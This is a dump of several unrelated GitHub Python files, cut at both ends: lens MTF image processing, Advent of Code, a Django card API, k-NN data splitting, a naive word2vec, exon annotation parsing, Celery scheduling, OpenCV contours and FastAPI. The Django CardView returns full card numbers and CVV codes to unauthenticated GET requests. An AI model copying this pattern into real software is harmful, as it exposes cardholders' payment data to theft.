plt.plot(com_heights, com_errors, '.')\n # plt.plot(rb_heights, red_errors*100, '.', color='red')\n # plt.plot(rb_heights, blue_errors*100, '.', color='blue')\n # plt.show()\n # exit()\n green_coeff = np.polyfit(com_heights, green_multipliers, 3)\n cosum = sum(green_coeff)\n scaling = 1.0 / cosum\n green_coeff = green_coeff * scaling\n red_coeff = np.polyfit(com_heights, red_multipliers, 3) * scaling\n blue_coeff = np.polyfit(com_heights, blue_multipliers, 3) * scaling\n\n # plt.plot(com_heights, (red_multipliers / green_multipliers - 1) * 10000, color='red')\n # plt.plot(com_heights, (blue_multipliers / green_multipliers - 1) * 10000, color='blue')\n # plt.show()\n # exit()\n\n # plt.plot(com_heights, green_multipliers,'.')\n # plt.plot(rb_heights, red_multipliers,'.', color='red')\n # plt.plot(rb_heights, blue_multipliers,'.', color='blue')\n # plt.ylim(green_multipliers[-2]-0.0001, green_multipliers[-2]+0.0001)\n # plt.show()\n\n alter = np.array((1.0, 1.0, 1.0, min(1.0, 1.0 / green_multipliers[-1])))\n\n greenlst = [\"{:.5f}\".format(_) for _ in list(green_coeff*alter)[:]]\n redlst = [\"{:.5f}\".format(_) for _ in list(red_coeff*alter)[:]]\n bluelst = [\"{:.5f}\".format(_) for _ in list(blue_coeff*alter)[:]]\n #\n green_geostring = \" \".join(greenlst)\n red_geostring = \" \".join(redlst)\n blue_geostring = \" \".join(bluelst)\n\n print(\"Geometric distortion coefficients (RGB):\")\n print(red_geostring)\n print(green_geostring)\n print(blue_geostring)\n # exit()\n # plt.plot(heights, multipliers)\n # plt.show()\n return red_geostring, green_geostring, blue_geostring, bother\n\n# distortioncalc(\"\", \"\")\n# exit()\nrandom_number = random.randint(1,9999)\nWORKING_DIR = \"/home/sam/mtfmapper_temp{}/\".format(random_number)\ntry:\n os.mkdir(WORKING_DIR)\nexcept FileExistsError:\n pass\n\n\nargv = sys.argv\n\ntry:\n startfile = int(argv[1])\nexcept ValueError:\n startfile = -1\n\nfor arg in argv[1:]:\n try:\n processpath = os.path.abspath(arg)\n except FileNotFoundError:\n continue\n\n process_subdir = os.path.join(processpath, \"mtfm3\")\n 
process_subdir_ca = os.path.join(processpath, \"mtfm4\")\n process_subdir_fullcorr = os.path.join(processpath, \"mtfm5\")\n print(\"Processing path {}\".format(processpath))\n\n try:\n os.mkdir(process_subdir)\n except FileExistsError:\n pass\n try:\n os.mkdir(process_subdir_ca)\n except FileExistsError:\n pass\n try:\n os.mkdir(process_subdir_fullcorr)\n except FileExistsError:\n pass\n\n dirlist = os.scandir(processpath)\n\n for entry in dirlist:\n if entry.name[-3:].upper() != \"RAF\":\n continue\n entrynumber = int(\"\".join([s for s in entry.name if s.isdigit()]))\n if entrynumber < startfile:\n continue\n\n # if entrynumber != 10:\n # continue\n\n # Check for existing results\n new_txtfilepath = os.path.join(process_subdir, \"{}.no_corr.sfr\".format(entry.name))\n new_txtfilepath_ca = os.path.join(process_subdir_ca, \"{}.ca_only.sfr\".format(entry.name))\n new_txtfilepath_fullcorr = os.path.join(process_subdir_fullcorr, \"{}.ca_and_distortion.sfr\".format(entry.name))\n\n new_esf_filepath = os.path.join(process_subdir, \"{}.no_corr.esf\".format(entry.name))\n new_esf_filepath_ca = os.path.join(process_subdir_ca, \"{}.ca_only.esf\".format(entry.name))\n new_esf_filepath_fullcorr = os.path.join(process_subdir_fullcorr, \"{}.ca_and_distortion.esf\".format(entry.name))\n\n print(\"Processing file {}\".format(entry.name))\n\n # Process RAF exif\n exif = subprocess.check_output([\"exiftool\", entry.path])\n exiflines = [line.decode(encoding='utf-8', errors='strict') for line in exif.splitlines()]\n\n aperture = \"\"\n focal_length = \"\"\n lens_model = \"\"\n max_aperture = \"\"\n distortionexif = \"\"\n ca_exif = []\n\n exifpath = os.path.join(process_subdir, entry.name + \".exif.csv\")\n exifpath_ca = os.path.join(process_subdir_ca, entry.name + \".exif.csv\")\n exifpath_fullcorr = os.path.join(process_subdir_fullcorr, entry.name + \".exif.csv\")\n\n if os.path.exists(exifpath):\n os.remove(exifpath)\n with open(exifpath, 'w') as file:\n writer = csv.writer(file, delimiter=\",\", quotechar=\"|\")\n for line in exiflines:\n tag, value = [s.strip() for s in line.split(\":\", 1)]\n writer.writerow([tag, value])\n # print(tag, value)\n if tag == \"Aperture\":\n aperture = value\n elif tag == \"Focal Length\" and \"equivalent\" not in value:\n focal_length = value\n elif tag == \"Lens Model\":\n lens_model = value\n elif tag == \"Max Aperture Value\":\n max_aperture = value\n elif tag == \"Geometric Distortion Params\":\n distortionexif = value\n elif tag == \"Chromatic Aberration Params\":\n ca_exif = value\n print(\"Lens Model {}, Aperture {}, Focal Length {}\".format(lens_model, aperture, focal_length))\n\n if ENABLE_CA_AND_DISTORTION:\n distorted = check_if_distortion_corrections_needed(distortionexif)\n caed = check_if_ca_corrections_needed(ca_exif)\n else:\n distorted = False\n caed = False\n\n print(ca_exif)\n if caed:\n print(\"Lens has LaCA correction in EXIF\")\n else:\n print(\"Lens does not need LaCA correction\")\n if distorted:\n print(\"Lens has distortion correction in EXIF\")\n else:\n print(\"Lens does not need distortion correction\")\n\n if (os.path.exists(new_txtfilepath) and\n (os.path.exists(new_txtfilepath_ca) or not caed) and\n (os.path.exists(new_txtfilepath_fullcorr) or not distorted) and\n os.path.exists(new_esf_filepath) and\n (os.path.exists(new_esf_filepath_ca) or not caed) and\n (os.path.exists(new_esf_filepath_fullcorr) or not distorted)):\n print(\"{} appears to already exist, skipping processing\".format(new_txtfilepath))\n continue\n if caed:\n if 
os.path.exists(exifpath_ca):\n os.remove(exifpath_ca)\n shutil.copy(exifpath, exifpath_ca) # Copy exif to results dir\n if distorted:\n if os.path.exists(exifpath_fullcorr):\n os.remove(exifpath_fullcorr)\n shutil.copy(exifpath, exifpath_fullcorr) # Copy exif to results dir\n\n # Symlink RAF file to working directory\n linked_raw_path = os.path.join(WORKING_DIR, entry.name)\n try:\n os.remove(linked_raw_path)\n except FileNotFoundError:\n pass\n print(\"Linking {} -> {}\".format(entry.path, linked_raw_path))\n os.symlink(entry.path, linked_raw_path)\n\n # Prepare to process raw\n uncorrected_image_path = linked_raw_path + \".tiff\"\n try:\n os.remove(uncorrected_image_path)\n print(\"Removed exising demosaiced image\")\n except FileNotFoundError:\n pass\n print(\"Calling Libraw dcraw_emu to demosaic...\")\n output = subprocess.check_output([\"/home/sam/LibRaw-0.19.2/bin/dcraw_emu\", \"-4\", \"-a\",\n \"-T\", \"-W\", linked_raw_path]) #\"-o\", \"0\", \"-M\",\n\n print(\"Running CA and maybe distortion correction loops...\")\n print()\n loops = [0]\n\n if caed:\n loops.append(1)\n if distorted:\n loops.append(2)\n for n in loops:\n if n == 0:\n print(\"Loop 1: No corrections\")\n elif n == 1:\n print(\"Loop 2: CA Corrections only\")\n if n >= 1:\n red, green, blue, bother = distortioncalc(None, ca_exif)\n if n == 2:\n red, green, blue, bother = distortioncalc(distortionexif, ca_exif)\n print(\"Loop 3: CA and distortion correction\")\n\n corrected_image_path = os.path.join(WORKING_DIR, entry.name + \".corrected.tiff\")\n\n channelpath = os.path.join(WORKING_DIR, entry.name+\".channel_%d.tiff\")\n\n redpath = os.path.join(WORKING_DIR, entry.name+\".channel_0.tiff\")\n greenpath = os.path.join(WORKING_DIR, entry.name+\".channel_1.tiff\")\n bluepath = os.path.join(WORKING_DIR, entry.name+\".channel_2.tiff\")\n\n print(\"Separating channels...\")\n output = subprocess.check_output([\"convert\", uncorrected_image_path, \"-depth\", \"16\",\n \"-channel\", \"RGB\", \"-separate\", channelpath])\n print(\"Processing red...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", red, redpath])\n if n == 2:\n print(\"Processing green...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", green, greenpath])\n else:\n print(\"Skipping green as CA correction only\")\n print(\"Processing blue...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", blue, bluepath])\n print(\"Merging channels...\")\n output = subprocess.check_output([\"convert\", \"-depth\", \"16\",\n redpath, greenpath, bluepath, \"-combine\", corrected_image_path])\n print(\"Removing temporary channel files...\")\n os.remove(redpath)\n os.remove(greenpath)\n os.remove(bluepath)\n\n if n == 0:\n image_to_analyse = uncorrected_image_path\n\n elif n >= 1:\n image_to_analyse = corrected_image_path\n else:\n raise Exception()\n\n print(\"Running mtf_mapper for loop {}...\".format(n+1))\n print(\"Analysing file '{}'...\".format(image_to_analyse))\n\n output = subprocess.check_output([\"mtf_mapper\", \"-a\", \"-q\", \"-l\", \"--nosmoothing\", \"-e\", image_to_analyse, WORKING_DIR])\n\n print(\"MTF Mapper output\", output)\n\n temp_mtf_output_path = os.path.join(WORKING_DIR, \"edge_sfr_values.txt\")\n temp_esf_output_path = os.path.join(WORKING_DIR, \"raw_esf_values.txt\")\n\n if n == 0:\n destination_txt_path = new_txtfilepath\n 
destination_esf_path = new_esf_filepath\n output = subprocess.check_output([\"convert\", uncorrected_image_path, uncorrected_image_path + \".jpg\"])\n elif n == 1:\n destination_txt_path = new_txtfilepath_ca\n destination_esf_path = new_esf_filepath_ca\n output = subprocess.check_output([\"convert\", corrected_image_path, corrected_image_path + \".ca_only.jpg\"])\n elif n == 2:\n destination_txt_path = new_txtfilepath_fullcorr\n destination_esf_path = new_esf_filepath_fullcorr\n output = subprocess.check_output([\"convert\", corrected_image_path, corrected_image_path + \".full.jpg\"])\n else:\n raise Exception()\n\n print(\"Moving {} -> {}\".format(temp_mtf_output_path, destination_txt_path))\n print(\"Moving {} -> {}\".format(temp_esf_output_path, destination_esf_path))\n try:\n os.remove(destination_txt_path)\n except FileNotFoundError:\n pass\n try:\n os.remove(destination_esf_path)\n except FileNotFoundError:\n pass\n shutil.move(temp_mtf_output_path, destination_txt_path)\n shutil.move(temp_esf_output_path, destination_esf_path)\n print()\n\n os.remove(linked_raw_path)\n print(\"Removing temporary file {}\".format(uncorrected_image_path))\n os.remove(uncorrected_image_path)\n if caed or distorted:\n print(\"Removing temporary file {}\".format(corrected_image_path))\n os.remove(corrected_image_path)\n print()\n\n\n # output = subprocess.check_output([\"convert\", uncorrected_image_path, \"-depth\", \"8\", \"-filter\", \"lanczos\",\n # \"-write\", \"MPR:orig\", \"+delete\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", red, \")\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", green, \")\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", blue, \")\",\n # \"-combine\", corrected_image_path])\n\n","repo_name":"tealtortoise/lentil","sub_path":"processrafs.py","file_name":"processrafs.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"5866112120","text":"import os\nimport re\nimport common.util as u\nimport numpy as np\nfrom collections import deque\n#print(os.getcwd())\n\n\ndef increase(a, v=1):\n for row in range(len(a)):\n for col in range(len(a[row])):\n if a[row,col] >= 0:\n a[row,col] +=1\n return a\n\ndef flash(g):\n rtn = False\n for row in range(len(a)):\n if row == 0:\n t=0\n b=2\n elif row == len(a)-1:\n t=1\n b=1\n else:\n t=1\n b=2\n \n\n for col in range(len(a[row])):\n if col == 0:\n l = 0\n r = 2\n elif col == len(a[row])-1: \n l = 1\n r = 1\n else:\n l = 1\n r = 2\n\n if g[row,col] > 9:\n local = g[(row-t):(row+b), (col-l):(col+r)]\n increase(local)\n g[row,col] = -1\n rtn = True\n\n return rtn\n\ndef reset(a,counter):\n round_counter = 0\n for row in range(len(a)):\n for col in range(len(data[row])):\n if a[row,col] == -1:\n a[row,col] = 0\n round_counter+=1\n counter+=round_counter\n return a,counter,round_counter\n\nif __name__ == \"__main__\":\n data = u.readfile(u.AOC_2021 + \"\\\\11\\\\input.txt\",Integer=False)\n\n for i in range(len(data)):\n t = []\n for j in range(len(data[i])):\n t.append(int(data[i][j]))\n data[i] = t\n a = np.array(data)\n # f = a.copy()\n # f.fill(1)\n # print(f) \n counter = 0\n print(a)\n for s in range(1000):\n #print(s)\n #step 1\n increase(a)\n #print(a)\n #step 2\n while flash(a): pass\n #print(a)\n #step 3\n a, counter,rc = reset(a,counter)\n if rc == 100:\n print(\"sync round: {}\".format(s+1))\n break\n 
print(a)\n print(counter)\n #print(\" X \")\n #print(a[r][c])\n # if a[(row-t):(row+b), (col-l):(col+r)].min() == a[row,col]:\n # print(a[row,col])\n # risk+= a[row,col]+1\n # low_points.append([row,col])","repo_name":"schroeder719/AdventOfCode","sub_path":"2021/11/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7622633786","text":"import json\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse, HttpResponse, HttpRequest\nfrom django.views import View\n\nfrom .models import Card\n\n\nclass CardView(View):\n def get(self, request):\n card_number = request.GET.get('card_number', None)\n if card_number:\n try:\n card = Card.objects.get(card_number=card_number)\n data = {\n 'id': str(card.id),\n 'card_number': card.card_number,\n 'expiry_date': card.expiry_date,\n 'cvv_code': card.cvv_code,\n 'issue_date': card.issue_date.strftime('%Y-%m-%d'),\n 'owner_id': str(card.owner_id),\n 'card_status': card.card_status\n }\n return JsonResponse(data)\n except ObjectDoesNotExist:\n return JsonResponse({'error': 'Card not found'}, status=404)\n else:\n return JsonResponse({'error': 'Please provide a card number.'}, status=400)\n\n def post(self, request: HttpRequest):\n # Parse the JSON data from the request body\n data = json.loads(request.body)\n\n # Create a new card object with the provided data\n card = Card(\n card_number=data['card_number'],\n expiry_date=data['expiry_date'],\n cvv_code=data['cvv_code'],\n issue_date=data['issue_date'],\n owner_id=data['owner_id'],\n card_status=data['card_status']\n )\n\n # Check if the card number is valid\n if not card.is_valid():\n return JsonResponse({'error': 'Invalid card number.'}, status=400)\n\n # Save the card object to the database\n card.save()\n\n # Return a success message\n response_data = {'message': 'Card created successfully'}\n return JsonResponse(response_data)\n","repo_name":"H0aqin/Abobaa","sub_path":"django/cards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9975770470","text":"import numpy as np\nfrom code.metrics import accuracy, MAE\n\n\"\"\"\n # There are functions where we separate and process our data. \n \n train_test_split : It allows us to divide our data according to the desired ratio.\n parameters : \n X : data feature,\n y : data class,\n rate : percentage of data split, default=0.8\n \n \n return : X_train, X_test, y_train, y_test\n \n stratified_train_test_split : It allows us to divide our data classes according to their types. \n It adds from each of our data classes in the train and test sections. \n parameters :\n X : data feature,\n y : data class, \n rate : percentage of data split \n \n return : X_train, X_test, y_train, y_test\n \n cross_val_score : It divides our data into k folds and allows each fold to be used as test data. 
\n parameters : \n model : machine learning model,\n X : data feature, \n y : data class,\n k_split : number of folds, default = 5, \n scoring : accuracy technique, default='accuracy',\n stratify : puts each class value in each fold, default=False\n \n return : accuracy value for each fold \n\n\"\"\"\n\ndef train_test_split(X, y, rate=0.8):\n idx = X.index.values.copy()\n np.random.seed(31) \n np.random.shuffle(idx) # shuffle to avoid data similarities \n X, y = np.asarray(X.loc[idx]), np.asarray(y.loc[idx]) \n \n point = int(len(X) * 0.8) # divide data by desired ratio \n \n return X[:point], X[point:], y[:point], y[point:]\n\ndef stratified_train_test_split(X, y, rate=0.8): \n train_idx = np.zeros((0,), dtype=int)\n test_idx = np.zeros((0,), dtype=int)\n \n labels = y.unique() # save all labels types in data \n for label in labels:\n idx = y[y == label].index.values.copy() # find all index of specific label \n np.random.seed(31) \n np.random.shuffle(idx) # shuffle to avoid data similarities \n train_idx = np.concatenate((train_idx, idx[:int(len(idx) * rate)]), axis=0) # separate data into test and train \n test_idx = np.concatenate((test_idx, idx[int(len(idx) * rate):]), axis=0)\n \n X, y = np.asarray(X), np.asarray(y)\n return X[train_idx], X[test_idx], y[train_idx], y[test_idx]\n\n\ndef cross_val_score(model, X, y, k_split = 5, stratify=False, scoring='accuracy'): \n if stratify: # If we want each label to be in each fold \n labels = y.unique()\n folds_idx = [list() for i in range(k_split)]\n index = 0\n for label in labels:\n idx = y[y == label].index.values.copy()\n np.random.seed(31)\n np.random.shuffle(idx)\n for j in idx:\n folds_idx[index].append(j)\n index += 1\n if index == len(folds_idx):\n index = 0 \n \n else: # divide our data by the desired number \n idx = X.index.values.copy()\n np.random.seed(31) \n np.random.shuffle(idx)\n folds_idx = np.split(idx, k_split) \n \n scores = list() \n for i in range(k_split):\n tmp = folds_idx.copy()\n test_ind = tmp.pop(i)\n train_ind = [ _ for sub in tmp for _ in sub]\n X_train, X_test, y_train, y_test = np.asarray(X.iloc[train_ind]), np.asarray(X.iloc[test_ind]), np.asarray(y[train_ind]), np.asarray(y[test_ind])\n model.fit_transform(X_train, y_train, X_test)# gives data to the model \n y_pred = model.predict(X_test) # output for test data by the model \n \n if scoring == 'accuracy':\n score = accuracy(y_test, y_pred)\n \n elif scoring == 'MAE':\n score = MAE(y_test, y_pred)\n \n scores.append(score) # saves the accuracy result for each fold \n \n scores = np.asarray(scores) \n scores = np.append(scores, [scores.min(), scores.mean(), scores.max()])\n return scores","repo_name":"MuratCelik3506/Hacettepe_University_First_2_Year","sub_path":"5_term/Assignment1_ K-Nearest_Neighbor/code/model_selection.py","file_name":"model_selection.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2207475317","text":"# encoding: utf-8\n\"\"\"\n@author: monitor1379\n@contact: yy4f5da2@hotmail.com\n\n@version: 1.0\n@file: models.py\n@time: 18-3-14 上午12:05\n\n这一行开始写关于本文件的说明与解释\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom word2vec.loader import Corpus\n\n\ndef lookup_row(table, row):\n return table[row: row + 1, :]\n\n\ndef set_row(table, row, value):\n table[row: row + 1, :] = value\n\n\ndef lookup_col(table, col):\n return table[:, col: col + 1]\n\n\ndef softmax(logits):\n shift_logits = logits - np.max(logits)\n 
exp_shift_logits = np.exp(shift_logits)\n return exp_shift_logits / np.sum(exp_shift_logits)\n\n\ndef sigmoid(z):\n if z > 6:\n return np.array([[1.0]])\n elif z < -6:\n return np.array([[0.0]])\n else:\n return 1 / (1 + np.exp(-z))\n\n\ndef sampling(data):\n return data[np.random.randint(len(data))]\n\n\nclass SkipGram(object):\n\n def __init__(self, sentences, word2id, id2word, words_len):\n self.sentences = sentences\n self.word2id = word2id\n self.id2word = id2word\n self.words_len = words_len\n self.words_list = list(word2id.keys())\n\n self.feature_dim = 0\n self.word_vec = None\n\n self.w0 = None\n self.w1 = None\n\n self.logger = {}\n\n def _train_one_step(self, target_word, another_word, label, lr):\n w0 = self.w0\n w1 = self.w1\n x_id = self.word2id[target_word]\n y_id = self.word2id[another_word]\n # TODO(monitor1379): 增加negative sampling\n # 前向计算\n logits = lookup_row(w0, x_id).dot(lookup_col(w1, y_id))\n output = sigmoid(logits)\n loss = np.abs(label - output[0][0])\n print(label, output[0][0])\n self.logger['loss'].append(loss)\n\n # 反向传播\n d_logit = (label - output) * output * (1 - output) # TODO(monitor1379): fix\n d_w1 = lookup_row(w0, x_id).T.dot(d_logit)\n d_w0 = d_logit.dot(lookup_col(w1, y_id).T)\n\n # 更新模型\n self.w1[:, y_id] += d_w1[:, 0] * lr\n self.w0[x_id, :] += d_w0[0, :] * lr\n\n def train(self, feature_dim, context_window_size, n_epochs, lr):\n self.logger['loss'] = []\n self.w0 = np.random.uniform(low=-0.5 / feature_dim, high=0.5 / feature_dim, size=[self.words_len, feature_dim])\n self.w1 = np.random.uniform(low=-0.5 / feature_dim, high=0.5 / feature_dim, size=[feature_dim, self.words_len])\n random_negative_sampling_times = 3\n\n for epoch in range(1, n_epochs + 1):\n print('{:0>3}/{}'.format(epoch, n_epochs))\n for sentence in self.sentences: # 对于每句话\n for target_word_index, target_word in enumerate(sentence): # 对于每个中心词\n window_start = max(target_word_index - context_window_size, 0)\n window_end = min(target_word_index + context_window_size + 1, len(sentence))\n\n for context_word_index in range(window_start, window_end): # 对于每个上下文窗口中的词\n context_word = sentence[context_word_index]\n self._train_one_step(target_word, context_word, label=1, lr=lr)\n for i in range(random_negative_sampling_times):\n self._train_one_step(target_word, sampling(self.words_list), label=0, lr=lr)\n\n plt.ylim([0, 1])\n plt.plot(self.logger['loss'])\n plt.show()\n # ***********************************************\n # TODO(monitor1379): Softmax + CrossEntropy\n # ***********************************************\n # logits = x.dot(w1)\n # output = softmax(logits)\n # loss = np.abs(1 - lookup_col(output, y_id))\n # print(lookup_col(output, y_id))\n # print(w0)\n # 反向传播,损失函数是cross entropy\n # d_logit = lookup_col(output, y_id) - 1\n # d_x = d_logit.dot(lookup_col(w1, y_id).T)\n # d_w1 = x.T.dot(d_logit)\n # w0[x_id] += d_x[0, :] * lr\n # w1[:, y_id] += d_w1[:, 0] * lr\n\n def find_nearest(self, word):\n pass\n\n def save_model(self, path):\n pass\n\n def load_model(self, path):\n pass\n\n\ndef run():\n corpus = Corpus()\n corpus.load_monitor1379_data('../data/monitor1379-data-100.txt')\n model = SkipGram(corpus.sentences, corpus.word2id, corpus.id2word, corpus.words_len)\n model.train(feature_dim=150, context_window_size=4, n_epochs=100, lr=0.01)\n\n\nif __name__ == '__main__':\n 
run()\n","repo_name":"monitor1379/NaiveWord2Vector","sub_path":"word2vec/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"983614092","text":"import pandas as pd\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"Retrieving the manufacturer's exon and transcript information\")\r\nparser.add_argument('input', metavar='input', type=str, nargs=1, help=\"The name of the information file\")\r\nparser.add_argument('output', metavar='output', type=str, nargs=1, help=\"The name of the output file\")\r\nargs=parser.parse_args()\r\n\r\n\r\ndef main(argv):\r\n input1=argv.input[0]\r\n output=argv.output[0]\r\n with open(input1,\"r\") as file:\r\n with open(output,\"w\") as outfile:\r\n for line in file: \r\n if line[1]!=\"J\" and line[1]!=\"P\":\r\n continue \r\n line=line.split(\",\")\r\n PSR=line[0].strip('\\\"')\r\n Strand=line[2].strip('\\\"')\r\n TC=line[6].strip('\\\"')\r\n TC=TC.split(\"///\")\r\n TCs=list(set(TC))\r\n Tc=TC[0]\r\n E=line[8].strip('\\\"')\r\n TR=line[14].strip('\\\"')\r\n Trstemp=TR.split(\"///\")\r\n Trs=list(Trstemp)\r\n for tr in range(len(Trs)):\r\n if \"to\" in E:\r\n #print(tr)\r\n Estemp=E.split(\"///\")\r\n Es=list(Estemp)\r\n #print(Es)\r\n #for e in Es:\r\n #junction: write lines for each with association next to it\r\n Ese=Es[tr].split(\"_\")\r\n row1=[Tc,PSR,Ese[0].strip('\\\"'),3,Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row1[0].split('.')[0],row1[1].split('.')[0],row1[2].split('.')[0],row1[3],row1[4].split('.')[0],row1[5])) \r\n row2=[Tc,PSR,Ese[2].strip('\\\"'),5,Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row2[0].split('.')[0],row2[1].split('.')[0],row2[2].split('.')[0],row2[3],row2[4].split('.')[0],row2[5])) \r\n else:\r\n Estemp=E.split(\"///\")\r\n Es=list(Estemp)\r\n e=Es[tr]\r\n row=[Tc,PSR,e.strip('\\\"'),\"\",Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row[0].split('.')[0],row[1].split('.')[0],row[2].split('.')[0],row[3],row[4].split('.')[0],row[5])) \r\n outfile.close()\r\n file.close() \r\n ExonAnnot=pd.read_table(output,header=None)\r\n ExonAnnot=ExonAnnot.sort_values(by=[0,1])\r\n ExonAnnot.to_csv(output,sep=\"\\t\",header=False,index=False)\r\n\t\r\n with open(output,\"r\") as file1:\r\n with open(\"LineIndexing_EAnnot_TrAnnot.txt\",\"w\") as outfile1:\r\n line=file1.readline()\r\n line=line.split(\"\\t\")\r\n TC=line[0]\r\n begin=1\r\n linenr=1\r\n length=1\r\n for line in file1:\r\n line=line.split(\"\\t\")\r\n linenr+=1\r\n TCtemp=line[0]\r\n if TC==TCtemp:\r\n length+=1\r\n else:\r\n row=[TC.split('.')[0],begin,length]\r\n outfile1.write(\"{0}\\t{1}\\t{2}\\n\".format(row[0],row[1],row[2]))\r\n begin=linenr\r\n length=1\r\n TC=TCtemp\r\n row=[TC.split('.')[0],begin,length] \r\n outfile1.write(\"{0}\\t{1}\\t{2}\\n\".format(row[0],row[1],row[2]))\r\n outfile1.close() \r\n file1.close()\r\n\r\nif __name__ == \"__main__\":\r\n main(args) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cran/REIDS","sub_path":"inst/doc/ExonAndTranscriptAnnotations.py","file_name":"ExonAndTranscriptAnnotations.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23698369691","text":"import logging\n\nfrom 
django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom django_celery_beat.models import IntervalSchedule, \\\n CrontabSchedule, PeriodicTask\n\nfrom reporting.tasks import create_reports_for_today\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Setup celery beat periodic tasks'\n\n @transaction.atomic\n def handle(self, *args, **options):\n logger.debug('Deleting all periodic tasks and schedules...')\n\n IntervalSchedule.objects.all().delete()\n CrontabSchedule.objects.all().delete()\n PeriodicTask.objects.all().delete()\n\n periodic_tasks_data = [\n {\n 'task': create_reports_for_today,\n 'name': 'Create reports for today.',\n 'cron': {\n 'minute': 59,\n 'hour': 23\n },\n 'enabled': True\n }\n ]\n\n for period_task in periodic_tasks_data:\n logger.debug(f'Setting up {period_task[\"task\"].name}')\n\n cron = CrontabSchedule.objects.create(\n **period_task['cron']\n )\n\n PeriodicTask.objects.create(\n name=period_task['name'],\n task=period_task['task'].name,\n crontab=cron,\n enabled=period_task['enabled']\n )\n","repo_name":"akhundMurad/shop","sub_path":"src/tasks/management/commands/setupperiodictasks.py","file_name":"setupperiodictasks.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1494114222","text":"#Finding an drawing contours\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\ndef main():\r\n \r\n location = \"C:\\\\Users\\\\Purneswar Prasad\\\\Documents\\\\misc\\\\\"\r\n imgpath = location + \"4.2.07.tiff\"\r\n img = cv2.imread(imgpath, 1)\r\n \r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n \r\n grayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n \r\n ret, thresh = cv2.threshold(grayscale_img, 127, 255, 0) #Change thresh value for different outputs\r\n \r\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n #In the video, it uses a img2 variable which is not required in higher versions of OpenCV\r\n \r\n cv2.drawContours(img, contours, -1, (0, 0, 255), 2)\r\n \r\n original = cv2.imread(imgpath, 1)\r\n \r\n original = cv2.cvtColor(original, cv2.COLOR_BGR2RGB)\r\n \r\n output = [original, img]\r\n titles = [\"Original Image\", \"Contours\"]\r\n \r\n for i in range(2):\r\n plt.subplot(1, 2, i+1)\r\n plt.imshow(output[i])\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n \r\n plt.show()\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n ","repo_name":"PurneswarPrasad/Image-Processing-project","sub_path":"saveIP48.py","file_name":"saveIP48.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40724019811","text":"from typing import Union\r\n\r\nfrom fastapi import Body, FastAPI\r\nfrom pydantic import BaseModel, Field\r\n\r\napp = FastAPI()\r\n\r\n\r\nclass Item(BaseModel):\r\n name: str\r\n description: Union[str, None] = Field(\r\n default=None, title=\"The description of the item\", max_length=300\r\n )\r\n price: float = Field(gt=0, description=\"The price must be greater than zero\")\r\n is_offer: Union[bool, None] = None\r\n\r\n\r\n@app.get(\"/\")\r\ndef read_root():\r\n return {\"Hello\": \"World\"}\r\n\r\n\r\n@app.get(\"/items/{item_id}\")\r\ndef read_item(item_id: int, q: Union[str, None] = None):\r\n return {\"item_id\": item_id, \"q\": q}\r\n\r\n\r\n@app.put(\"/items/{item_id}\")\r\ndef update_item(item_id: int, item: 
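# --- Illustrative sketch (not part of the contour record above) ---
# The same find-and-draw pipeline on a synthetic image, so it runs without the
# hard-coded Windows path. In OpenCV 4.x findContours returns (contours, hierarchy),
# which is why the record no longer needs the extra return value its comment mentions.
import numpy as np
import cv2

canvas = np.zeros((200, 200, 3), dtype=np.uint8)
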